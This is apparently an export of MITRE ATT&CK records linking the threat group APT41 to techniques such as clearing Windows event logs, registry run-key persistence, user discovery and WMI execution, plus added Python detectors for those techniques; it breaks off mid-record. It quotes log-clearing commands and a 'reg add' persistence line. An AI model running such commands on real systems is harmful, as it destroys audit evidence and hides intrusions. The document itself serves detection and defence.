external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) attempted to remove evidence of some of its activity by clearing Windows security and system events.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--4cbd1250-5e79-46c0-b38f-83bd5942f44c
|
||
revoked : False
|
||
technique : Clear Windows Event Logs
|
||
technique_description : Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
|
||
|
||
The event logs can be cleared with the following utility commands:
|
||
|
||
* <code>wevtutil cl system</code>
|
||
* <code>wevtutil cl application</code>
|
||
* <code>wevtutil cl security</code>
|
||
|
||
These logs may also be cleared through other mechanisms, such as the Event Viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command <code>Remove-EventLog -LogName Security</code> to delete the Security event log and, after a reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)
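As an added example, not from the page or its citations, the Python below matches both sides of this technique against constructed data: the records the Microsoft-Windows-Eventlog provider writes when a log is cleared (event 1102 in the Security log, event 104 in the System log) and the utility commands listed above, plus <code>wevtutil sl ... /e:false</code>, which disables a log rather than clearing it. Hostnames, user names and command lines are constructed.

```python
import re

# Records the Microsoft-Windows-Eventlog provider writes when a log is cleared.
# 1102 lands in the cleared Security log itself; 104 goes to the System log and names
# the cleared channel. Both survive the clear because they are written after it.
PROVIDER = "Microsoft-Windows-Eventlog"
CLEAR_EVENT_IDS = {("Security", 1102), ("System", 104)}

WEVTUTIL_CLEAR_RE = re.compile(
    r"(?<![\w.])wevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+(?P<log>\S+)", re.I)
WEVTUTIL_DISABLE_RE = re.compile(
    r"(?<![\w.])wevtutil(?:\.exe)?\s+(?:sl|set-log)\s+(?P<log>\S+)\s+(?:.*\s)?/e:false", re.I)
PS_CLEAR_RE = re.compile(r"\b(?P<cmdlet>Clear-EventLog|Remove-EventLog)\b", re.I)
PS_LOGNAME_RE = re.compile(r"-LogName\s+['\"]?(?P<log>[^\s'\"]+)", re.I)


def findings_from_events(events) -> list:
    """Match cleared-log records. The actor is whatever user field the sensor
    exported (SubjectUserName for 1102)."""
    out = []
    for ev in events:
        if ev.get("provider") == PROVIDER and (ev["channel"], ev["event_id"]) in CLEAR_EVENT_IDS:
            out.append({"host": ev["host"], "user": ev.get("user"),
                        "cleared_log": ev.get("cleared_channel", ev["channel"]),
                        "evidence": f"{ev['channel']} event {ev['event_id']}"})
    return out


def findings_from_cmdlines(cmdlines) -> list:
    """Match the utility commands: wevtutil cl/clear-log, wevtutil sl /e:false
    (disable) and the Clear-EventLog / Remove-EventLog cmdlets."""
    out = []
    for c in cmdlines:
        m = WEVTUTIL_CLEAR_RE.search(c)
        if m:
            out.append({"action": "clear", "log": m["log"], "cmdline": c})
            continue
        m = WEVTUTIL_DISABLE_RE.search(c)
        if m:
            out.append({"action": "disable", "log": m["log"], "cmdline": c})
            continue
        m = PS_CLEAR_RE.search(c)
        if m:
            ln = PS_LOGNAME_RE.search(c)
            action = "remove" if m["cmdlet"].lower() == "remove-eventlog" else "clear"
            out.append({"action": action, "log": ln["log"] if ln else None, "cmdline": c})
    return out


# Constructed event records (normalised EVTX fields) and process command lines.
SAMPLE_EVENTS = [
    {"host": "srv-app02", "channel": "Security", "event_id": 1102, "provider": PROVIDER,
     "user": "svc-backup"},
    {"host": "srv-app02", "channel": "System", "event_id": 104, "provider": PROVIDER,
     "user": "svc-backup", "cleared_channel": "System"},
    {"host": "srv-app02", "channel": "Security", "event_id": 4624,
     "provider": "Microsoft-Windows-Security-Auditing", "user": "svc-backup"},
]
SAMPLE_CMDLINES = [
    "wevtutil cl security",
    r"C:\Windows\System32\wevtutil.exe clear-log Microsoft-Windows-PowerShell/Operational",
    'powershell.exe -nop -w hidden -c "Remove-EventLog -LogName Security"',
    "wevtutil sl Security /e:false",
    "wevtutil qe Security /c:5 /f:text",
]

if __name__ == "__main__":
    for f in findings_from_events(SAMPLE_EVENTS) + findings_from_cmdlines(SAMPLE_CMDLINES):
        print(f)
```

Because 1102 and 104 are written after the clear they survive it, but only locally, and only until the next clear; forwarding events to a collector as they are written is what preserves the cleared content itself, and a gap in the forwarded stream from a host followed by a 1102 is the pattern to alert on.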
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
|
||
technique_id : T1070.001
|
||
matrix : mitre-attack
|
||
platform : ['Windows']
|
||
data_sources : ['Command: Command Execution', 'File: File Deletion', 'Process: OS API Execution', 'Process: Process Creation']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) created and modified startup files for persistence.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) [APT41](https://attack.mitre.org/groups/G0096) added a registry key in <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost</code> to establish persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)
|
||
relationship_id : relationship--6ad8e998-041f-491d-8691-4990022248e0
|
||
revoked : False
|
||
technique : Registry Run Keys / Startup Folder
|
||
technique_description : Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
|
||
|
||
The following run keys are created by default on Windows systems:
|
||
|
||
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>
|
||
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
|
||
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>
|
||
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
|
||
|
||
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> key is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)
|
||
|
||
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>. The startup folder path for all users is <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>.
|
||
|
||
The following Registry keys can be used to set startup folder items for persistence:
|
||
|
||
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
|
||
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
|
||
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
|
||
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
|
||
|
||
The following Registry keys can control automatic startup of services during boot:
|
||
|
||
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
|
||
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
|
||
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code>
|
||
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>
|
||
|
||
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
|
||
|
||
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>
|
||
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>
|
||
|
||
Programs listed in the load value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run automatically for the currently logged-on user.
|
||
|
||
By default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
|
||
|
||
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
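The key list above is long enough that matching it by eye is error-prone. The Python below is an added example, not from the page or its citations, that normalises a registry write (hive aliases, HKU\<SID> folded to the per-user view, Wow6432Node dropped) and classifies it against every autostart location named in the description plus the Svchost key from the APT41 relationship. Shell Folders, the Windows key and Session Manager count as autostarts only when the Startup, load or BootExecute value is the one written, and an unchanged default BootExecute is ignored. Startup-folder file drops are handled too. All events, paths, the SID and the data values are constructed.

```python
import re

HIVE_ALIASES = {"hklm": "HKEY_LOCAL_MACHINE", "hkcu": "HKEY_CURRENT_USER", "hku": "HKEY_USERS"}
DEFAULT_BOOT_EXECUTE = ["autocheck autochk *"]

# Autostart locations from the technique text, plus the Svchost key from the APT41
# relationship. Matched with fullmatch against the normalised, lower-cased sub-path.
ASEP_PATTERNS = [
    (r"software\\microsoft\\windows\\currentversion\\run(once)?", "run_key"),
    (r"software\\microsoft\\windows\\currentversion\\runonceex(\\.*)?", "runonceex"),
    (r"software\\microsoft\\windows\\currentversion\\runservices(once)?", "runservices"),
    (r"software\\microsoft\\windows\\currentversion\\policies\\explorer\\run", "policy_run"),
    (r"software\\microsoft\\windows\\currentversion\\explorer\\(user )?shell folders", "shell_folders"),
    (r"software\\microsoft\\windows nt\\currentversion\\windows", "winlogon_load"),
    (r"system\\currentcontrolset\\control\\session manager", "boot_execute"),
    (r"software\\microsoft\\windows nt\\currentversion\\svchost", "svchost_groups"),
]
# Keys that are only autostarts when a specific value is written.
VALUE_FILTER = {"shell_folders": {"startup", "common startup"},
                "winlogon_load": {"load"}, "boot_execute": {"bootexecute"}}
STARTUP_DIR_RE = re.compile(r"(?:\\users\\[^\\]+\\appdata\\roaming|\\programdata)"
                            r"\\microsoft\\windows\\start menu\\programs\\startup\\[^\\]+$", re.I)


def normalize_key(key: str):
    """Expand hive aliases, fold HKU\\<SID>\\... to the per-user view, drop Wow6432Node."""
    parts = key.split("\\")
    hive = HIVE_ALIASES.get(parts[0].lower(), parts[0].upper())
    rest = parts[1:]
    if hive == "HKEY_USERS" and rest:
        hive, rest = "HKEY_CURRENT_USER", rest[1:]
    rest = [p for p in rest if p.lower() != "wow6432node"]
    return hive, "\\".join(rest).lower()


def classify_registry_event(key: str, value_name: str, data):
    """Autostart category for a registry write, or None if it is not one."""
    hive, path = normalize_key(key)
    for pattern, category in ASEP_PATTERNS:
        if not re.fullmatch(pattern, path):
            continue
        wanted = VALUE_FILTER.get(category)
        if wanted and (value_name or "").lower() not in wanted:
            return None
        values = data if isinstance(data, list) else [data]      # BootExecute is REG_MULTI_SZ
        if category == "boot_execute" and [v.lower() for v in values] == DEFAULT_BOOT_EXECUTE:
            return None                                          # unchanged default
        scope = "machine" if hive == "HKEY_LOCAL_MACHINE" else "user"
        return {"category": category, "scope": scope, "key": f"{hive}\\{path}",
                "value": value_name, "data": data}
    return None


def classify_file_event(path: str):
    """Startup-folder drops for the current user or for all users."""
    if not STARTUP_DIR_RE.search(path):
        return None
    return {"category": "startup_folder",
            "scope": "user" if "\\users\\" in path.lower() else "machine", "path": path}


def triage(events) -> list:
    """events: ("reg", key, value_name, data) or ("file", path) tuples."""
    hits = [classify_file_event(ev[1]) if ev[0] == "file" else classify_registry_event(*ev[1:])
            for ev in events]
    return [h for h in hits if h]


# Constructed events; the SID, file names and data values are made up for the example.
SAMPLE_EVENTS = [
    ("reg", r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost", "securitysvcs", ["UpdateSvc"]),
    ("reg", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDriveUpdate",
     r"C:\Users\jdoe\AppData\Roaming\od.exe"),
    ("reg", r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend", "1",
     r"C:\temp\evil.dll"),
    ("reg", r"HKLM\SYSTEM\CurrentControlSet\Control\Session Manager", "BootExecute",
     ["autocheck autochk *"]),
    ("reg", r"HKLM\SYSTEM\CurrentControlSet\Control\Session Manager", "BootExecute",
     ["autocheck autochk *", r"C:\Windows\Temp\boot.exe"]),
    ("reg", r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders",
     "Startup", r"C:\Users\jdoe\AppData\Roaming\x"),
    ("reg", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders", "Personal",
     r"C:\Users\jdoe\Documents"),
    ("file", r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\update.lnk"),
    ("file", r"C:\Users\jdoe\Documents\report.docx"),
]

if __name__ == "__main__":
    for h in triage(SAMPLE_EVENTS):
        print(h["category"], h["scope"], h.get("key") or h.get("path"))
```

Every write to these locations is an autostart change, but not every one is malicious; installers and Windows itself touch the Run keys constantly, so the classifier is meant to feed a baseline (what this host's ASEPs looked like yesterday) rather than to page on each hit. The Svchost and RunOnceEx\Depend categories and any BootExecute change are rare enough to alert on directly.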
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
|
||
technique_id : T1547.001
|
||
matrix : mitre-attack
|
||
platform : ['Windows']
|
||
data_sources : ['Command: Command Execution', 'File: File Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Creation', 'Windows Registry: Windows Registry Key Modification']
|
||
permissions_required : ['Administrator', 'User']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used the WMIEXEC utility to execute <code>whoami</code> commands on remote machines.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--ae12b657-a640-40c6-99b7-931ed10705de
|
||
revoked : False
|
||
technique : System Owner/User Discovery
|
||
technique_description : Adversaries may attempt to identify the primary user, the currently logged-in user, the set of users that commonly use a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
|
||
|
||
Various utilities and commands may acquire this information, including <code>whoami</code>. On macOS and Linux, the currently logged-in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.
|
||
|
||
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
|
||
technique_id : T1033
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows', 'Network']
|
||
data_sources : ['Active Directory: Active Directory Object Access', 'Process: OS API Execution', 'Command: Command Execution', 'Network Traffic: Network Traffic Content', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Windows Registry: Windows Registry Key Access', 'File: File Access', 'Process: Process Access']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via [PowerSploit](https://attack.mitre.org/software/S0194).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
relationship_id : relationship--f395cb28-5bc0-487e-b679-155ac785b7d9
|
||
revoked : False
|
||
technique : Windows Management Instrumentation
|
||
technique_description : Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)
|
||
|
||
An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
|
||
technique_id : T1047
|
||
matrix : mitre-attack
|
||
platform : ['Windows']
|
||
data_sources : ['Network Traffic: Network Connection Creation', 'Process: Process Creation', 'WMI: WMI Creation', 'Command: Command Execution']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 